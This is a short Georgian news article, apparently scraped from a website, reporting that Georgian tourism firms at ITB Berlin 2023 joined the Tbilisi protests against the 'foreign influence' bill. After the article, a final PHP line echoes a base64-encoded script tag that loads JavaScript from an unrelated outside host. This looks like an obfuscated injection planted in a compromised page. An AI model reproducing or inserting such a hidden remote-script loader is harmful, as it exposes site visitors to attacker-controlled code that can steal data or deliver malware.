celsiusi
ავერსი საქკაბელი

ბერლინში მიმდინარე მსოფლიოში უდიდესი ტურისტული გამოფენაზე - ITB Berlin 2023 ჩასული ტურისტული კომპანიები პარლამენტთან მიმდინარე საპროტესტო აქციას უერთდებიან.

აღნიშნულის შესახებ BB Travel-ის დამფუძნებელი ალექსანდრე გიორგიძე Facebook-ის პირად გვერდზე პოსტს აქვეყნებს, სადაც ტურისტული კომპანიების წარმომადგენლები წარწერებით „არა რუსულ კანონს!!!“ არიან წარმოდგენილნი.
„ტურისტული კომპანიები ბერლინის გამოფენიდან ვუერთდებით თბილისში მიმდინარე პროტესტს.
არა ღრუსულ კანონს!!!“ - წერს ტურისტული კომპანიის დამფუძნებელი.
აღსანიშნია, რომ ბერლინში მსოფლიოში უდიდესი ტურისტული გამოფენა - ITB Berlin 2023 პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა საქართველოს სტენდთან ოფიციალურად დღეს გახსნა და მასზე 80-მდე ქართული კომპანიაა წარმოადგენილი.
შეგახსენებთ, რომ დღეს პარლამენტმა "უცხოური გავლენის გამჭვირვალობის შესახებ" კანონპროექტი პირველი მოსმენით მიიღო. კანონპროექტის განხილვის პარალელურად მთელი დღის განმავლობაში პარლამენტთან კანონპროექტის მოწინააღმდეგეთა აქცია მიმდინრეობდა. ადგილზე მობილიზებულნი არიან სპეცდანიშნულების რაზმები და სამართალდამცველები.

609
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");